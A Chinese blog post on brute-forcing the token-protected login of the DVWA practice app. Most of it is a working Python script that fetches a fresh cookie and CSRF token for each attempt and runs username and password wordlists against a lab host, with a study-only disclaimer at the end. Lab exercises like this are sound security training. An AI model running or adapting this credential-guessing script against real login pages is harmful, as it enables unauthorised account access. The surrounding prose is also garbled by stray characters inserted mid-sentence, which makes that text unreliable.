新版DVWA登錄窗口暴力破解

  • 新版的DVWA剛開(kāi)始一登錄的窗口不像以前只要使用Burpsuite抓個(gè)包爆破下就可以,現(xiàn)在是在登錄的請(qǐng)求頭中加了隨機(jī)的token
  • 所以使用Burpsuite和OWASP ZAP 沒(méi)有用
  • 嘗試使用腳本進(jìn)行匹配爆破猜解出賬戶(hù)和密碼
  • Python腳本如下盒蟆,使用的是Python3
#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi


import urllib
import requests
from bs4 import BeautifulSoup


##第一步,先訪問(wèn) http://10.7.9.23/dvwa/login.php頁(yè)面,獲得服務(wù)器返回的cookie和token
def get_cookie_token():
    headers = {'Host': '10.7.9.23',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Lanuage': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
               'Connection': 'keep-alive',
               'Upgrade-Insecure-Requests': '1'}
    res = requests.get("http://10.7.9.23/dvwa/login.php", headers=headers)
    cookies = res.cookies
    a = [(';'.join(['='.join(item) for item in cookies.items()]))]  ## a為列表换况,存儲(chǔ)cookie和token
    html = res.text
    soup = BeautifulSoup(html, "html.parser")
    token = soup.form.contents[3]['value']
    a.append(token)
    return a

##第二步模擬登陸
def Login(a, username, password):  # a是包含了cookie和token的列表
    headers = {'Host': '10.7.9.23',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Lanuage': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
               'Connection': 'keep-alive',
               'Content-Length': '88',
               'Content-Type': 'application/x-www-form-urlencoded',
               'Upgrade-Insecure-Requests': '1',
               'Cookie': a[0],
               'Referer': 'http://10.7.9.23/dvwa/login.php'}
    values = {'username': username,
              'password': password,
              'Login': 'Login',
              'user_token': a[1]
              }
    data = urllib.parse.urlencode(values)
    resp = requests.post("http://10.7.9.23/dvwa/login.php", data=data, headers=headers)
    return


# 重定向到index.php
def main():
    with open("user.txt", 'r') as f:
        users = f.readlines()
        for user in users:
            user = user.strip("\n")  # 用戶(hù)名
            with open("passwd.txt", 'r') as file:
                passwds = file.readlines()
                for passwd in passwds:
                    passwd = passwd.strip("\n")  # 密碼
                    a = get_cookie_token()  #a列表中存儲(chǔ)了服務(wù)器返回的cookie和token
                    Login(a, user, passwd)
                    headers = {'Host': '10.7.9.23',
                               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
                               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                               'Accept-Lanuage': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                               'Connection': 'keep-alive',
                               'Upgrade-Insecure-Requests': '1',
                               'Cookie': a[0],
                               'Referer': 'http://10.7.9.23/dvwa/login.php'}
                    response = requests.get("http://10.7.9.23/dvwa/index.php", headers=headers)
                    if response.headers['Content-Length'] == '7524':  # 如果登錄成功
                        print("用戶(hù)名為:%s ,密碼為:%s" % (user, passwd))  # 打印出用戶(hù)名和密碼
                        break

if __name__ == '__main__':
    main()
  • 執(zhí)行結(jié)果


    2019-11-17_200425.png
  • 免責(zé)申明:本人所撰寫(xiě)的文章,僅供學(xué)習(xí)和研究使用,請(qǐng)勿使用文中的技術(shù)或源碼用于非法用途镜撩,任何人造成的任何負(fù)面影響房资,或觸犯法律,與本人無(wú)關(guān)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末忍些,一起剝皮案震驚了整個(gè)濱河市鲁猩,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌罢坝,老刑警劉巖廓握,帶你破解...
    沈念sama閱讀 217,277評(píng)論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異嘁酿,居然都是意外死亡隙券,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,689評(píng)論 3 393
  • 文/潘曉璐 我一進(jìn)店門(mén)闹司,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)娱仔,“玉大人,你說(shuō)我怎么就攤上這事游桩∩龋” “怎么了耐朴?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,624評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)盹憎。 經(jīng)常有香客問(wèn)我筛峭,道長(zhǎng),這世上最難降的妖魔是什么陪每? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,356評(píng)論 1 293
  • 正文 為了忘掉前任影晓,我火速辦了婚禮,結(jié)果婚禮上奶稠,老公的妹妹穿的比我還像新娘俯艰。我一直安慰自己,他們只是感情好锌订,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,402評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布竹握。 她就那樣靜靜地躺著,像睡著了一般辆飘。 火紅的嫁衣襯著肌膚如雪啦辐。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 51,292評(píng)論 1 301
  • 那天蜈项,我揣著相機(jī)與錄音芹关,去河邊找鬼。 笑死紧卒,一個(gè)胖子當(dāng)著我的面吹牛侥衬,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播跑芳,決...
    沈念sama閱讀 40,135評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼轴总,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了博个?” 一聲冷哼從身側(cè)響起怀樟,我...
    開(kāi)封第一講書(shū)人閱讀 38,992評(píng)論 0 275
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎盆佣,沒(méi)想到半個(gè)月后往堡,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,429評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡共耍,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,636評(píng)論 3 334
  • 正文 我和宋清朗相戀三年虑灰,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片痹兜。...
    茶點(diǎn)故事閱讀 39,785評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡穆咐,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出佃蚜,到底是詐尸還是另有隱情庸娱,我是刑警寧澤,帶...
    沈念sama閱讀 35,492評(píng)論 5 345
  • 正文 年R本政府宣布谐算,位于F島的核電站熟尉,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏洲脂。R本人自食惡果不足惜斤儿,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,092評(píng)論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望恐锦。 院中可真熱鬧往果,春花似錦、人聲如沸一铅。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,723評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)潘飘。三九已至肮之,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間卜录,已是汗流浹背戈擒。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,858評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留艰毒,地道東北人筐高。 一個(gè)月前我還...
    沈念sama閱讀 47,891評(píng)論 2 370
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像丑瞧,于是被迫代替她去往敵國(guó)和親柑土。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,713評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容

  • title: DVWA之暴力破解date: 2019-03-19 19:00:50tags:- DVWA- bur...
    Miracle778閱讀 2,859評(píng)論 0 5
  • 本文是Medusa和Hydra快速入門(mén)手冊(cè)的第二部分嗦篱,第一部分的傳送門(mén)這兩篇也是后續(xù)爆破篇的一部分冰单,至于字典,放在...
    LinuxSelf閱讀 2,853評(píng)論 0 4
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡(jiǎn)介 我們...
    三月行者閱讀 1,887評(píng)論 1 17
  • DVWA實(shí)踐 Web漏洞原理 1. DVWA環(huán)境搭建 Warmpserver+DVWA 2. Brute Forc...
    JasonChiu17閱讀 3,752評(píng)論 0 19
  • 工作的原因灸促,最近一段時(shí)間集中寫(xiě)了很多新聞稿诫欠,現(xiàn)將一些體會(huì)到的要點(diǎn)記錄下來(lái),后續(xù)待時(shí)機(jī)成熟時(shí)再充實(shí)完整后發(fā)表浴栽,希望可...
    李鍇鍇閱讀 915評(píng)論 0 51